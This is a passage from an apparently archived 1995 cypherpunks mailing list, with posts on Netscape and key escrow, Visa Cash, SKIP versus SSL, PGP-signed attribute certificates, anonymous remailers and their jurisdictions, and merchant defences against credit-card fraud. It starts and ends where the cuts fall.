  Alice de 'nonymous ...
  
                                    ...just another one of those...
  
  
  P.S.  This post is in the public domain.
                    C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
  





From s1113645 at tesla.cc.uottawa.ca  Thu Nov 30 08:26:02 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Fri, 1 Dec 1995 00:26:02 +0800
Subject: [Rant!] Death by praise Re: Netscape gives in to key escrow
In-Reply-To: <Pine.3.89.9511300825.A27268-0100000@styx.ios.com>
Message-ID: <Pine.3.89.9511301034.B32713-0100000@tesla.cc.uottawa.ca>




On Thu, 30 Nov 1995, Jay Holovacs wrote:

> On Thu, 30 Nov 1995, Timothy C. May wrote:
> > Can Netscape continue to prosper? This latest issue won't kill it,
> 
> I suspect this will unfortunately help. Stockholders are interested in 
> profits, not principles. Co-oping with the feds will help Netscape get to 
> the commercial market sooner, and most customers, sadly don't give a damn 
> about privacy (or don't understand).

<Rant mode on>
Clipper and family are vampires; shine some light on them and they're dead.
Witness the public ridicule of the FBI 1% scheme. Compare that to the near
mainstream silence about DT. The last round of Clipper was wonderful, for 
a while in '94 we had Time sounding like Brock Meeks.

If Jim Clark really does mean this nonsense then I hope he does a Dorothy 
Denning and takes his show on the road (sorry Jeff). This is simply 
easy fodder for journalists without a story, totally black and white 
cheap shot at the gov. While people don't give a damn about their privacy, 
they sure do get mad when they're shown how easy it is to take away. 
They *hate* hearing the $ cost.

Maybe some of the people on this list with higher profiles than myself should
start defending Clipper and GAK as loudly and stupidly as possible. I've 
grown dead tired of trying to get anyone around me interested in pgp,
remailers and whatnot. Reverse psycho sounds a lot easier:

"Noted counterterrorism expert Timothy May was quoted on Connie Chung Live 
last night as saying "Clipper, GAK and CTHULHU666 are a hundred billion 
dollar investment in your national security. Only through complete wiretapping 
will we save our nation's children from violent cigarette smokers, tax 
cheaters, unlicensed pit-bull owners, Tax 'n Spend Liberals, murderous Nation 
of Islam Dope Pushers, audiophiles, christians, fat people, OJ and 
jaywalkers on the infohighway." -USA Today" 

(Apologies. You may now killfile me with a clear conscience.)

If you can't beat 'em, subvert 'em.






From pati at ipied.tu.ac.th  Thu Nov 30 08:30:56 1995
From: pati at ipied.tu.ac.th (Patiwat Panurach)
Date: Fri, 1 Dec 1995 00:30:56 +0800
Subject: VisaCash security.
In-Reply-To: <9511300318.AA02710@zorch.w3.org>
Message-ID: <Pine.SUN.3.91.951130113539.3024C-100000@ipied.tu.ac.th>


	I have read that Visa intends to begin a digital cash system, 
using both discardable and recharable cards that would implement secure 
cash transations.  The system is now in use in Australia, and there are 
plans for use during the Olympic Games at Atlanta and a pilot project in 
Thailand.
	Does anybody know if this is truly "cash"?  Is is tracable, and 
what encryption does it use?

------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati at ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe








From trei at process.com  Thu Nov 30 08:31:30 1995
From: trei at process.com (Peter Trei)
Date: Fri, 1 Dec 1995 00:31:30 +0800
Subject: Netscape gives in to key escrow
Message-ID: <9511301611.AA00257@toad.com>


Jeff wrote:
> sameer wrote:
> > http://www.cnet.com/Central/News/govt.html
> >         Bad. Very Bad. And I was almost starting to like Netscape.
>   Please don't give up on us yet. 
[...]
> PS - you won't find a LEF(sic)  in the soon to be released SSL Version 3 spec...
> Jeff Weinstein - Electronic Munitions Specialist

I've been trying to figure out the boundary conditions of the speech - what's the best 
and worst interpretations that can be placed upon it. I was not at the show.

Worst: Netscape will put GAK into every server and browser it sells or distributes.

Best: Out of context, misinterpreted quote, referring to the Fortezza support in the 
newest version of SSL. 

Fortezza (and the earlier, related Tessera) are PCMCIA cards with Clipper chips.
Clipper, as we know, *is* escrowed.

There's a lot of interest within the USG for using Web-based technologies for 
distributing information, some of it confidential. With a Fortezza-based laptop and
a Fortezza-enabled browser, a government employee  would be able to securely obtain 
text and graphics info while out in the field - for example, a social worker looking up
case histories while at a client's home, to choose a fairly uncontroversial example.

At a W3C meeting a few months ago, some NSA employees demoed a Tessera 
enabled Mosaic client and server. 

Netscape (and other SW companies) would like to sell to the USG - it's a big market.
Adding support for USG supported security systems expands that potential market.


Jeff, this does not let you or Netscape off of the hook. A *lot* of people are wondering 
just exactly what Jim was alluding to,. and would like to see a full, in-context quote.


speaking only for myself (whatever that is worth :-)

	Peter Trei
	trei at process.com





From pete at loshin.com  Thu Nov 30 08:38:16 1995
From: pete at loshin.com (Pete Loshin)
Date: Fri, 1 Dec 1995 00:38:16 +0800
Subject: "Proprietary" internetworking protocols (was RE: The future will be  easy to use )
Message-ID: <01BABEAC.2E90BDC0@ploshin.tiac.net>


Oops, sorry about the unfortunate juxtaposition of POTP with 
the SKIP thread. I didn't mean to imply anything more about POTP
than that they were around in Boston in case anyone wanted
to talk to them.

My comments about "proprietary" internetworking protocols
related to discussion of Sun's SKIP, not at all to POTP, whose
protocol hasn't been published and won't be published if they
don't get their patent.

I was simply observing that Perry's comment:

"...an internetworking protocol [e.g. SKIP] used by only 
one vendor gets nowhere."

is not necessarily true, and pointed to SSL and NFS as 
counter-examples.

-pl

Phill wrote:

>Both Netscape and Sun had a product that had a large number of seats. From what I 
>have seen the POTP have diddly squat in the way of seats.
>
>Looking at the market today it is clear that there are fewer oppotunities to do that 
>type of roll out. Netscape and Sun were running just ahead of a market. Today I 
>don't see how many people will want to abandon PGP for a product that is 
>indistinguishable from smoke 'n mirrors.
>
>	Phill






From jamesd at echeque.com  Thu Nov 30 08:46:17 1995
From: jamesd at echeque.com (James A. Donald)
Date: Fri, 1 Dec 1995 00:46:17 +0800
Subject: The future will be easy to use
Message-ID: <199511301622.IAA08684@blob.best.net>



>Jon Lasser writes:
>> However, if you have optional linking of ID and name, shippers will only 
>> ship to keys with such attributes. Because just ID and address, it could 
>> be a "hit and run" type attack shipped to a safe maildrop.

At 03:19 AM 11/30/95 -0500, Futplex wrote:
>People who steal credit cards prefer to order goods to be delivered somewhere
>they can grab them.

Presumably all of us seek a ecash and echeque system somewhat better
than a human readable sixteen decimal digit number:

Indeed, what I had in mind was 1024 binary bit number -- we should be
working to a world in which a self generated secret PGP key performs the
functions that a credit card number does today.





 (Often this is just the front of the rightful owner's
>home, while Holly the Homeowner is off at work.) But that's just another
>reason to cut down unauthorized credit card charges, not a reason to restrict
>what a rightful cardholder can do with the card. I _want_ to be able to have
>stuff delivered to arbitrary locations, and I _don't_ want to give that up
>just to make it tough on thieves.
>
>James Donald writes:
>> This argument makes no sense at all:  I am going to attack my
>> enemies by paying people to send books, computers, and stuff
>> to them?
>
>Ordering hardcore porno videos to be sent to, say, somewhere in Tennessee
>might work pretty well in our sadly repressed society.
>
>-Futplex <futplex at pseudonym.com>
>
>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From jamesd at echeque.com  Thu Nov 30 08:51:07 1995
From: jamesd at echeque.com (James A. Donald)
Date: Fri, 1 Dec 1995 00:51:07 +0800
Subject: The future will be easy to use
Message-ID: <199511301622.IAA08718@blob.best.net>


From: Rich Salz <rsalz at osf.org>
> > There is, of course, no way to interpret the semantics of this
electronically.

At 10:11 AM 11/30/95 EST, Carl Ellison wrote:
> Of course not.  In the end, a human needs to make the decision based on
> ASCII text.

For those ascii texts that belong to a small and commonly used set,
we can set our computers to automatically follow certain policies,
and to bring to our attention "special case" texts that lie outside
this set.



 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From BRUEN at mitlns.mit.edu  Thu Nov 30 08:52:01 1995
From: BRUEN at mitlns.mit.edu (Bob Bruen, MIT Lab for Nuclear Science)
Date: Fri, 1 Dec 1995 00:52:01 +0800
Subject: cypherpunks at ietf
Message-ID: <951130112515.44600c48@mitlns.mit.edu>



  I thought the following mail might be of interest. It's not my doing.

                    Bob
=========================================================================

From:	SMTP%"MEYERUSA at aol.com" 30-NOV-1995 10:25:39.59
To:	BRUEN
CC:	
Subj:	Re: DISCUSSION FOR IETF DALLAS

Date: Thu, 30 Nov 1995 08:49:15 -0500
Sender:ietf-request at IETF.CNRI.Reston.VA.US
From: MEYERUSA at aol.com
Message-ID: <951130084914_120843907 at mail06.mail.aol.com>
To: rgm3 at is.chrysler.com
cc: ietf at CNRI.Reston.VA.US, SteveCase at aol.com
Subject: Re: DISCUSSION FOR IETF DALLAS

THE WWW MUST BE CONSUMER FRIENDLY IF IT IS TO SURVIVE.

THE AVERAGE CONSUMER THRU A PC, OR A "DEDICATED WEB TERMINAL ON TOP OF THEIR
TV SET", MUST BE ABLE TO USE THE WEB IN THE FUTURE TO:

          1. SEARCH FOR CONSUMER GOODS; ORDER CONSUMER GOODS.
          2. USE THE WEB FOR TELEPHONE COMMUNICATIONS AND E-MAIL
          3. DOWNLOAD TIME SHIFT AUDIO & VIDEO
          4. DOWLOAD MOVIES, SOFTWARE, AND P.P.V. EVENTS
          5. HOOK ON-LINE TO VIDEO & AUDIO 

THE WWW AND THE ON-LINE SERVICES MUST BE ABLE TO DIAL OUT TO THE CONSUMER
ALSO.

OUR BIGGEST FUTURE PROBLEM IS THAT WE CAN NOT LET BILL GATES, NOR THE
TELEPHONE COMPANIES, NOR THE CABLE TV COMPANIES, NOR THE MADISON AVENUE
ADVERTISING AGENCIES GET CONTROL OF THE WWW.

OUR CURRENT PROBLEM IS THAT THE AVERAGE CONSUMER CAN NOT COMPLETE AN ACCURATE
SEARCH ON THE WEB.

COMPANIES MUST BE ABLE TO PROTECT THEIR TRADEMARKS AND SERVICE MARKS, AND TO
EMBED EVERY POSSIBLE KEYWORD IN THEIR SITE SO THAT IN THE FUTURE A CONSUMER
COULD ENTER AT THE SEARCH LINE:
        "SHOW ALL DEALERS IN BALTIMORE THAT SELL CHRYSLER MINI-VANS"
AND AN ACCURATE SEACH OF THE WEB WILL BE RETURNED.

AT THIS POINT SO MANY CYBERPUNKS HAVE EMBEDDED SO MUCH GARBAGE ON THE WEB,
THAT YOU CAN NOT COMPLETE AN ACCURATE SEARCH.

OUR COMPANY HAS BEEN ASKED BY THE NEW YORK AUTO SHOW TO CREATE THE MOST
HIGHTECH VIRTUAL REALITY MOTION SIMULATOR THEATRE FOR THE 1996 NEW YORK AUTO
SHOW. DURING OUR RESEARCH, WE ENTERED "NEW YORK AUTO SHOW" IN OUR WEB CRAWLER
(AMERICA ON-LINE). YOU COULD NOT BELIEVE ALL OF THE GARBAGE THAT WAS RETURNED
FROM OUR SEARCH.

ADDITIONALLY FOR EXAMPLE, IF ON AMERICA ON-LINE YOU NEED TO SEND AN E-MAIL TO
DONALD TRUMP OR TO AOL'S STEVE CASE, WHEN YOU SEARCH THE AOL MEMBER DATABASE,
WHO IS THE REAL DONALD TRUMP OR THE REAL STEVE CASE.

IN SUMMARY, WHAT NEEDS TO BE DISCUSSED AT  IETF IN DALLAS NEXT WEEK IS A
STANDARD THAT PROTECTS TRADEMARKS AND SERVICE MARKS, AND ALSO A POLICING
AGENCY THAT WILL DETERMINE THAT DONALD TRUMP IS AT DONALD TRUMP@, CHRYSLER IS
AT CHRYSLERY@ BILL GATES IS AT BILL GATES@, ETC.

BUT MORE IMPORTANT, WE NEED TO CLEANUP THE TRASH THAT THE CYBER-PUNKS ARE
PLACING ON THE WEB.


ED MEYER 





From sameer at c2.org  Thu Nov 30 08:53:51 1995
From: sameer at c2.org (sameer)
Date: Fri, 1 Dec 1995 00:53:51 +0800
Subject: Netscape gives in to key escrow
In-Reply-To: <30BD716E.5F69@netscape.com>
Message-ID: <199511301616.IAA18452@infinity.c2.org>


	Can we get the text of the actual speech?

Unless Netscape officially issues a statement on their home page, and
as a press release, saying that the press coverage was wrong and
Netscape is *against* any and all forms of GAK, then I think we should
assume that Netscape official position is in favor of GAK, and speak
out about it as such.

	It is very damn close to the wire. Even though the speech may
have been misreported, it is the reporting that affects public
opinion. Even if Netscape has no current products or plans to release
products implementing GAK, in light of this press coverage, unless
they issue a statement saying they are against GAK, then they are for
GAK.
	I haven't given up on Netscape, yet-- I'm waiting for an
official word.

	Jeff: If Netscape comes out in favor of GAK, will you leave?
(Wait until February, at least, of course..) You don't have to answer
that to me, or the list, just think about it, and answer it for
yourself.  Do you think "anyone else" there would leave, as you say
below that they don't want to go down history, etc...

> 
> sameer wrote:
> > 
> > http://www.cnet.com/Central/News/govt.html
> > 
> >         Bad. Very Bad. And I was almost starting to like Netscape.
> 
>   Please don't give up on us yet.  All press accounts I've read so far
> have lots of stuff attributed to Jim, but very little of it is actual
> quotes.  There appears to be lots of paraphrasing and interpretation
> being done on the part of the reporters.  The impression that I'm
> getting is that the press has blown a couple of small sound bites
> way out of proportion.  The infoworld article that covers the same
> speech only devotes about 20% of the article to the key escrow topic,
> and is similarly devoid of actual quotes.
> 
>   I have not spoken to Jim about this, and I did not hear the talk
> myself, so I'm mostly reading between the lines here.  After I saw the
> story earlier today I started asking around to see if the company
> had made any major policy shift in the direction of GAK, and wasn't
> able to turn up anything.  If anything its the opposite.
> 
>   My feelings about key escrow, which were echo'd by several folks
> in management when I spoke to them today are:
> 
> 	o Government mandated escrow would be a bad thing
> 	o There are some settings where escrow is good, in the corporate
> 		setting, or as a matter of person choice(to protect against
> 		loss of password)
> 	o The whole issue of escrow should be de-coupled from the
> 		export issue
> 
>   I don't want to go down in history as a facilitator of the totalitarian
> state, and I don't think anyone else here does either.  I hope folks
> wait for press releases, product announcements, etc. before condemning us
> too much.  Jim has made comments in the past that were quoted out of
> context, and blown way out of proportion to the point that some people
> believed that we were monitoring our user's every keystroke and sending
> it all back to the home office to generate huge demographic databases.
> I suspect that this is the same sort of thing, and I hope everyone will
> judge us by what we do.
> 
> 	--Jeff
> 
> PS - you won't find a LEF in the soon to be released SSL Version 3 spec...
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw at netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From sameer at c2.org  Thu Nov 30 08:54:27 1995
From: sameer at c2.org (sameer)
Date: Fri, 1 Dec 1995 00:54:27 +0800
Subject: Credit card theft Re: The future will be easy to use
In-Reply-To: <Pine.3.89.9511300805.B35014-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511301606.IAA17493@infinity.c2.org>


> Or c2.org, which might then make things interesting if the theft is detected.
> (in a very perverse, and tooth-gnashingly aggravating way, of course).
> Would Sameer cooperate with the LEAs to catch "an anonymous suspect using
> his service"? 

	Community ConneXion will comply with all properly formed court
orders and subpeonas. We will *not* cooperate without court
intervention. (I.e. Mr. FBI calls up and says "can you help us find
this suspect"? I respond "got a subpoena?")

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From cme at TIS.COM  Thu Nov 30 09:01:49 1995
From: cme at TIS.COM (Carl Ellison)
Date: Fri, 1 Dec 1995 01:01:49 +0800
Subject: Attribute-testimony example (was Re: The future will be easy to use)
In-Reply-To: <199511301622.IAA08718@blob.best.net>
Message-ID: <9511301638.AA05094@tis.com>


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Wed, 29 Nov 1995 08:20:46 -0800
>From: "James A. Donald" <jamesd at echeque.com>
>
>From: Rich Salz <rsalz at osf.org>
>> > There is, of course, no way to interpret the semantics of this
>> > electronically.
>
>At 10:11 AM 11/30/95 EST, Carl Ellison wrote:
>> Of course not.  In the end, a human needs to make the decision based on
>> ASCII text.
>
>For those ascii texts that belong to a small and commonly used set,
>we can set our computers to automatically follow certain policies,
>and to bring to our attention "special case" texts that lie outside
>this set.

Exactly!

We haven't yet learned that small and commonly used set -- understandably,
since the field is so new.  I'd be willing to bet that association between
a key and a checking account would be on the list.  Beyond that, I don't
know.

Once an element of that set is identified, it can be assigned a codeword
(to make parsing easier).

For example, a general certificate might be:

- -----BEGIN PGP SIGNED MESSAGE-----

Signing-Key-ID: f149b8e7e1f71e60964fff361dae2460
Signed-Key-ID: 76c68cb46a8e3de1509acaf4170feb10
Meaning: I have met this person, introduced to me as James, who signed
	with that key and I found him to be about 25 years old, roughly
	5'11" and with dark hair.  Beyond that I don't remember much.

- -----BEGIN PGP SIGNATURE-----
[...]   signature with the signing key
- -----END PGP SIGNATURE-----



While the specialized one might be:

- -----BEGIN PGP SIGNED MESSAGE-----

Signing-Key-ID: bc2cb00144f223498fcc074eabb821d0
Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: checking-account: 116 94265, First Security Bank

- -----BEGIN PGP SIGNATURE-----
[...]   signature with First Security Bank's key
- -----END PGP SIGNATURE-----



This format has several advantages over ASN.1, of course, but I won't
belabor that point here.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme at tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML3ddFQXJENzYr45AQFxVQP/StUBo3fx4K97pv36af+2V40GUEGJircj
lNWZXeZAlsU/i+wdEzzRF3nWQ/H6wZjJgQDVNlox74CsMJp6T1YLDvbJ6/EAMG9M
kFIp6X2xkgnlZcH/4WsKqBDwTmF0kR0qoPWJY+7w5mtCrKNfsfN9JMaD4xdhueaM
U323z50t7ck=
=CxNl
-----END PGP SIGNATURE-----





From s1113645 at tesla.cc.uottawa.ca  Thu Nov 30 09:02:52 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Fri, 1 Dec 1995 01:02:52 +0800
Subject: e-cash gambling
In-Reply-To: <199511301536.QAA25670@utopia.hacktic.nl>
Message-ID: <Pine.3.89.9511301102.A24799-0100000@tesla.cc.uottawa.ca>




On Thu, 30 Nov 1995, Anonymous wrote:

> I would like to see e-cash gambling on US Presidential elections/primaries
> [as is currently done in London & Moscow]. There was an interesting W$J
> article that pointed out how the odds in these gambling houses track the
> results of elections more accurately (from thousands of miles away) than
> Gallup & Roper ever have, (and without calling me at suppertime)<g>. The

Idea Futures. (This has already been mentioned in this thread)
There is an outfit calling itself Ideosphere that is planning a 
commercial version of an Idea Futures. It is certainly fairer than online 
roulette. You might want to try the game out yourself. Dr. Froomkin has a 
link to it on his homepage (I think). 

> It would accomplish the cypherpunk goals of setting important information
> free through use of our technology, it would encourage gamblers to learn
> about strong crypto, and it would use crypto for something besides child
> porn or drugs, which will be good PR for us. There will, of course, be

Incidentally there are a lot of crypto related claims being played (which
is natural considering the number of cpunks in the game).





From sameer at c2.org  Thu Nov 30 09:42:15 1995
From: sameer at c2.org (sameer)
Date: Fri, 1 Dec 1995 01:42:15 +0800
Subject: "Got a subpoena?"
In-Reply-To: <Pine.SUN.3.91.951130113015.132b-100000@goya>
Message-ID: <199511301704.JAA23295@infinity.c2.org>


> "finessing" laws will become more important.  In short, they WILL have
> a subpoena--then what?

	Then they'll find out that I don't have any information that
could help them, anyway.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From pete at loshin.com  Thu Nov 30 09:46:35 1995
From: pete at loshin.com (Pete Loshin)
Date: Fri, 1 Dec 1995 01:46:35 +0800
Subject: "Proprietary" internetworking protocols (was RE: The future will be easy to use )
Message-ID: <01BABF1F.0246DD80@ploshin.tiac.net>


Perry wrote:
>Pete Loshin writes:
>> I was simply observing that Perry's comment:
>> 
>> "...an internetworking protocol [e.g. SKIP] used by only 
>> one vendor gets nowhere."
>> 
>> is not necessarily true, and pointed to SSL and NFS as 
>> counter-examples.
>
>I disagree.
>
>First of all, NFS was not competing with other widely available
>standards.

Neither was SSL, for that matter.  But it seems like every vendor
who's written an S-HTTP browser/server is adding SSL for version 1.1.

>Second of all, other vendors are committed to developing the other
>standard.
>
>What good will it be to run SKIP when your Cisco router wants to talk
>to you with something else?

None, of course, just as rsh doesn't help me connect to a telnet 
server. My comment wasn't on the wisdom of SKIP, but rather on 
the specific statement Perry made about single vendors being able 
to drive certain protocols on their own (e.g., SSL and others).

More interesting from the historical view (but lacking in crypto 
significance so I'll refrain from further posting on the topic) 
is the question of what other protocols have been put forth by 
single vendors and gained major market share.

-pl






From KJC at cityscape.co.uk  Thu Nov 30 10:10:16 1995
From: KJC at cityscape.co.uk (KJC)
Date: Fri, 1 Dec 1995 02:10:16 +0800
Subject: [Rant!] Death by praise Re: Netscape gives in to key escrow
Message-ID: <199511301736.RAA29417@ns.cityscape.co.uk>


>
>
>On Thu, 30 Nov 1995, Jay Holovacs wrote:
>
>> On Thu, 30 Nov 1995, Timothy C. May wrote:
>> > Can Netscape continue to prosper? This latest issue won't kill it,
>> 
>> I suspect this will unfortunately help. Stockholders are interested in 
>> profits, not principles. Co-oping with the feds will help Netscape get to 
>> the commercial market sooner, and most customers, sadly don't give a damn 
>> about privacy (or don't understand).
>
><Rant mode on>
>Clipper and family are vampires; shine some light on them and they're dead.
>Witness the public ridicule of the FBI 1% scheme. Compare that to the near
>mainstream silence about DT. The last round of Clipper was wonderful, for 
>a while in '94 we had Time sounding like Brock Meeks.
>
>If Jim Clark really does mean this nonsense then I hope he does a Dorothy 
>Denning and takes his show on the road (sorry Jeff). This is simply 
>easy fodder for journalists without a story, totally black and white 
>cheap shot at the gov. While people don't give a damn about their privacy, 
>they sure do get mad when they're shown how easy it is to take away. 
>They *hate* hearing the $ cost.
>
>Maybe some of the people on this list with higher profiles than myself should
>start defending Clipper and GAK as loudly and stupidly as possible. I've 
>grown dead tired of trying to get anyone around me interested in pgp,
>remailers and whatnot. Reverse psycho sounds a lot easier:
>
>"Noted counterterrorism expert Timothy May was quoted on Connie Chung Live 
>last night as saying "Clipper, GAK and CTHULHU666 are a hundred billion 
>dollar investment in your national security. Only through complete wiretapping 
>will we save our nation's children from violent cigarette smokers, tax 
>cheaters, unlicensed pit-bull owners, Tax 'n Spend Liberals, murderous Nation 
>of Islam Dope Pushers, audiophiles, christians, fat people, OJ and 
>jaywalkers on the infohighway." -USA Today" 
>
>(Apologies. You may now killfile me with a clear conscience.)
>
>If you can't beat 'em, subvert 'em.
>
>
>
As a _very_ low profile member of this list I thought a futile gesture
was needed at this point:
                        *I agree with you*
I've been trying to interest the  BBC in the U.K. in pgp, clipper et al 
for ages - I give up!.- BTW- after 'Britland' MPs posted hear a while back
I thought _maybe_ we'd hear more.Will the last one to leave Grate Britain
please switch out the lights!
kc

------------------------------------------------------     
Fingerprint:OF 3B IE 6A 8D 14 EC 9B 75 9B FB A2 E8 35 FE            
Finger: .plan + public key -> af91 at ftp.cityscape.co.uk
http://www.gold.net/users/af91/kjc.htm
"...and now...five in a row by Whitney Houston"

------------------------------------------------------

   





From anonymous-remailer at shell.portal.com  Thu Nov 30 10:12:57 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 1 Dec 1995 02:12:57 +0800
Subject: List of reliable remailers
Message-ID: <199511301739.JAA13160@jobe.shell.portal.com>


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 21 Nov 1995, Raph Levien wrote:

> Groups of remailers sharing a machine or operator:
> (robo syrinx c2)
> (flame hacktic replay)
> (alumni portal)

Anything more specific on the above info? 

  robo, syrinx, c2 all running on c2.org
  alumni, portal run by Hal Finney
  hacktic, replay run on xs4all / by Alex de Joode?

ok so far, but flame is xs4all/de Joode as well?

flame used to be:

  Slovenian Anonymous Remailer <remailer at flame.sinet.org>

Does the fact that it is now listed along with hacktic and replay now
imply that it is no longer / never was in Slovenia?

The reason for asking is that jurisdictions are interesting properties
for remailers.  The more jurisdictions available the better the legal
morass can be created by remailing through 101 different jurisdictions.

Speaking of which, these new additions:

  ford <remailer at bi-node.zerberus.de>
  ecafe <cpunk at remail.ecafe.org>

are welcome aditions both being in Europe (Germany, and UK respectively)

Any other European/Australasian cypherpunks care to add a remailer in
their jurisdiction?

Alice de 'nonymous ...

[just giving the acquired nym a work out, and I wanted to ask the Q
anyway, so I thought I may as well flesh this Nym out, and give it a
better rep than the impostor who refuses to sign posts :-) Again,
anything that isn't signed isn't from me.]

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML3jzIbu8OQjKS7RAQFIQQP/ShGx18pfAT0TZcsAaY0T/LRuaXkE+C+k
9lL6mXo/FY1bHDXFUsNkb4wjJx6RujyMRWL6eI7T/ph531CY2wYaBzVdMXHjPy8m
kCMSZai08WlLJboe06tlZCGHvpDEqGPATZd1VZoulFSD1F9Ughhidspvp9/jqIR8
q/cZbGkWSrY=
=vvNf
-----END PGP SIGNATURE-----






From anon-remailer at utopia.hacktic.nl  Thu Nov 30 10:21:52 1995
From: anon-remailer at utopia.hacktic.nl (Name Withheld by Request)
Date: Fri, 1 Dec 1995 02:21:52 +0800
Subject: Spam the Sign II
Message-ID: <199511301740.SAA29245@utopia.hacktic.nl>


Looks like Spam the Sign I was a little premature.





From jlasser at rwd.goucher.edu  Thu Nov 30 10:23:17 1995
From: jlasser at rwd.goucher.edu (Jon Lasser)
Date: Fri, 1 Dec 1995 02:23:17 +0800
Subject: The future will be easy to use
In-Reply-To: <01HY8GNOCLCS8WYXCN@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.91.951130123239.3869A-100000@rwd.goucher.edu>


On Thu, 30 Nov 1995, E. ALLEN SMITH wrote:

> However, if you have optional linking of ID and name, shippers will only 
> ship to keys with such attributes. Because just ID and address, it could 
> be a "hit and run" type attack shipped to a safe maildrop.
> ---------------------------------
> 	If the transaction is via a Credit Card, it's the card issuer's
> liability (and responsibility to determine creditworthiness), unless I'm badly
> mistaken. If it's bank-issued ecash, then it's up to the bank to disgorge
> physical dollars when ecash is presented to them. What's the risk in either
> case?

Credit card fraud -- ie I've snarfed someone's card number and they 
haven't figured it out yet.

Cardholder's liability is $50 (I think).  Depending on the situation (if 
it's a card-is-physically-present transaction or a not-present) the 
liability falls to either the bank or the merchant.

A "proof of address" is a darn good way to reduce (not prevent, reduce) 
that sort of fraud.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser at rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.






From jlasser at rwd.goucher.edu  Thu Nov 30 10:38:46 1995
From: jlasser at rwd.goucher.edu (Jon Lasser)
Date: Fri, 1 Dec 1995 02:38:46 +0800
Subject: The future will be easy to use
In-Reply-To: <199511300704.XAA01742@blob.best.net>
Message-ID: <Pine.SUN.3.91.951130123535.3869B-100000@rwd.goucher.edu>


On Tue, 28 Nov 1995, James A. Donald wrote:

> >Not if you're encrypting a Credit Card transaction to ship physical 
> >goods.  In that case, I'm going to certainly want to link a key ID to a 
> >physical body (or at least address) if I'm the seller, so as to limit 
> >liability as best I can.
> 
> Not at all:  All you need to do is be able to prove you shipped 
> to the address requested:  You do not have to know what the 
> relationship is between the address requested and identity 
> paying you to ship.

That's if you're accusing the merchant of fraud. I'm positing someone's 
using a stolen credit card number.  (Yes, these will still exist for at 
least a while after e-cash becomes commonplace).  If I'm a merchant, I'm 
going to really want (if I know it's possible) to ship only to what's 
been "the address on the card" (or, in reality, in the database under the 
card's number) so that it's harder (not impossible, harder) for people to 
defraud me.

> > However, if you have optional linking of ID and name, shippers will only 
> > ship to keys with such attributes. Because just ID and address, it could 
> > be a "hit and run" type attack shipped to a safe maildrop.
> 
> This argument makes no sense at all:  I am going to attack my
> enemies by paying people to send books, computers, and stuff
> to them?

No; you're going to steal from your enemies by having them ship things to 
you without payment.

Note that in an ecash economy, this isn't a problem.  The original post 
was about the transition between the current economy and a "cypherpunks" 
economy, during which I suggested that encryption would be used to 
protect credit card numbers (and be a "proof of identity" -- which I was 
claiming wouldn't work without ecash (proof of non-fraud payment))

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser at rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.






From attila at primenet.com  Thu Nov 30 10:46:01 1995
From: attila at primenet.com (attila)
Date: Fri, 1 Dec 1995 02:46:01 +0800
Subject: The future will be easy to use
In-Reply-To: <9511300751.ZM7630@morgan.com>
Message-ID: <Pine.BSD.3.91.951130174443.7762B-100000@usr3.primenet.com>


On Thu, 30 Nov 1995, P. Rajaram wrote:

> On Nov 29, 10:25pm, attila wrote:
> > Subject: Re: The future will be easy to use
> >    OK, I have not seen it (like I said, I will get it) or read ipsec.
> >
> >    However, despite the group ego, Sun _does_ listen and Sun does wish to
> > be the leader. If the rest of ipsec group has a specific list, maybe it
> > needs to presented higher up the pole.
> 
> There are different groups within Sun.
> The people pushing SKIP don't talk much with the group building IPv6.
>
   that's a given. NIBM (not invented by ME) syndrome.  That is what 
needs to stop. however, Sun has been playing the game recently of 
